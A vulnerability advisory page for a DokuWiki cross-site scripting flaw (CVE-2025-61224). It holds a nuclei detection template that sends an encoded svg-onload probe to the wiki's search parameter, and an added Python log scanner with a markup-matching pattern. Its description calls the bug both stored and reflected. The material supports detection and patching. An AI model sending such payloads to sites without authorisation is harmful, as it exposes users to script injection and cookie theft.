DokuWiki <= 2025-05-14a Librarian - Reflected Cross-Site Scripting
CVE-2025-61224
Early Release
Description
DokuWiki 2025-05-14a 'Librarian' contains a stored XSS caused by improper sanitization of the 'q' parameter, letting remote attackers execute arbitrary scripts; exploitation requires no special privileges.
Severity
Medium
CVSS Score
6.1
Exploit Probability
0%
Affected Product
dokuwiki
Published Date
June 16, 2026
Template Author
lolkatz, 0x_akoko
CVE-2025-61224.yaml
id: CVE-2025-61224

info:
  name: DokuWiki <= 2025-05-14a Librarian - Reflected Cross-Site Scripting
  author: lolkatz,0x_Akoko
  severity: medium
  description: |
    DokuWiki 2025-05-14a 'Librarian' contains a stored XSS caused by improper sanitization of the 'q' parameter, letting remote attackers execute arbitrary scripts; exploitation requires no special privileges.
  impact: |
    Remote attackers can execute arbitrary scripts in users' browsers, potentially stealing cookies or performing actions on behalf of users.
  remediation: |
    Update to the latest version of DokuWiki.
  reference:
    - https://github.com/dokuwiki/dokuwiki/issues/4512
    - https://github.com/MarioTesoro/vulnerability-research/tree/main/CVE-2025-61224
    - https://nvd.nist.gov/vuln/detail/CVE-2025-61224
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2025-61224
    epss-score: 0.00404
    epss-percentile: 0.31973
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    vendor: dokuwiki
    product: dokuwiki
    shodan-query: http.html:"content=\"DokuWiki"
    fofa-query: body="content=\"DokuWiki"
  tags: cve,cve2025,dokuwiki,xss,reflected

http:
  - method: GET
    path:
      - '{{BaseURL}}/doku.php?id=start&do=search&q=the%20%40%3Csvg%2Fonload%3Dalert%60document.domain%60%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'current changed">@<svg/onload=alert'
          - 'content="DokuWiki'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100bcc36f38be969d88cd9ef5e092d381cdb9ba2de6d2eceb88b40d12737359abaf022100ce4e3865b3e78bda4a4dd000c031b3a44498fd71f9b4eac4bb8db9a3c38431b6:922c64590222798bb761d5b6d8e72950
Score
6.1
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
CVE-2025-61224
CWE ID:
CWE-79
Remediation Steps
Update to the latest version of DokuWiki.
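Beyond patching, a defender usually wants to know whether the probe shape used by the template above has already been sent at the wiki. The following Python is an added example (not part of the nuclei template, of DokuWiki, or of the linked research): it scans web-server access logs for a GET to doku.php with do=search whose q parameter, after URL decoding, carries HTML markup such as a tag opener or an on* event-handler attribute. The log lines, client addresses and timestamps are constructed for the example, and the common/combined log format is an assumption.

```python
"""Flag DokuWiki search requests whose ``q`` parameter carries HTML markup.

Added example, not code from the nuclei template or from DokuWiki.
Assumes common/combined access-log lines; all sample data is constructed.
"""
import re
from html import unescape
from urllib.parse import parse_qs, unquote, urlsplit

# Common/combined log format: we only need client, timestamp, request line, status.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Markup that has no business in a wiki search term: a tag opener followed by
# a tag name (or "<!"), or an on* event-handler attribute.
_MARKUP_RE = re.compile(r'<\s*/?\s*[a-z!]|\bon[a-z]+\s*=', re.IGNORECASE)


def decode_param(value: str) -> str:
    """Normalise a query value: peel repeated URL-encoding, then HTML entities.

    parse_qs already decodes one layer; this removes layers an evasive client
    might stack on top so the markup check sees the final text.
    """
    prev = None
    for _ in range(3):  # bounded so a pathological value cannot loop forever
        if value == prev:
            break
        prev, value = value, unquote(value)
    return unescape(value)


def suspicious_query(target: str):
    """Return the decoded q value when the request is a doku.php search whose
    term contains markup; return None for anything else."""
    parts = urlsplit(target)
    if not parts.path.endswith('/doku.php'):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if 'search' not in qs.get('do', []):  # the endpoint the template exercises
        return None
    for q in qs.get('q', []):
        decoded = decode_param(q)
        if _MARKUP_RE.search(decoded):
            return decoded
    return None


def scan_log(lines):
    """Return (client ip, timestamp, status, decoded q) for each suspicious request."""
    hits = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        decoded = suspicious_query(m.group('target'))
        if decoded is not None:
            hits.append((m.group('ip'), m.group('ts'), int(m.group('status')), decoded))
    return hits


# Constructed sample lines (not real traffic). Line 1 mirrors the template's
# request; line 2 is the same term URL-encoded twice; line 3 is a benign search;
# line 4 carries markup in q but is not a search action, so it is not reported.
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Jun/2026:10:00:01 +0000] "GET /doku.php?id=start&do=search'
    '&q=the%20%40%3Csvg%2Fonload%3Dalert%60document.domain%60%3E HTTP/1.1" 200 5120',
    '203.0.113.7 - - [16/Jun/2026:10:00:02 +0000] "GET /doku.php?do=search'
    '&q=%2540%253Csvg%252Fonload%253Dalert%2560document.domain%2560%253E HTTP/1.1" 200 5100',
    '198.51.100.4 - - [16/Jun/2026:10:00:03 +0000] "GET /doku.php?id=start&do=search'
    '&q=installation%20guide HTTP/1.1" 200 4800',
    '198.51.100.4 - - [16/Jun/2026:10:00:04 +0000] "GET /doku.php?id=wiki:syntax'
    '&q=%3Cb%3E HTTP/1.1" 200 9000',
]

if __name__ == '__main__':
    for ip, ts, status, q in scan_log(SAMPLE_LOG):
        print(f'{ts} {ip} status={status} q={q!r}')
```

Run as a script it prints the two probe-shaped requests. The do=search condition deliberately mirrors the template's endpoint; drop that check in `suspicious_query` if you also want q values on other actions reported, and feed real log lines in place of `SAMPLE_LOG`.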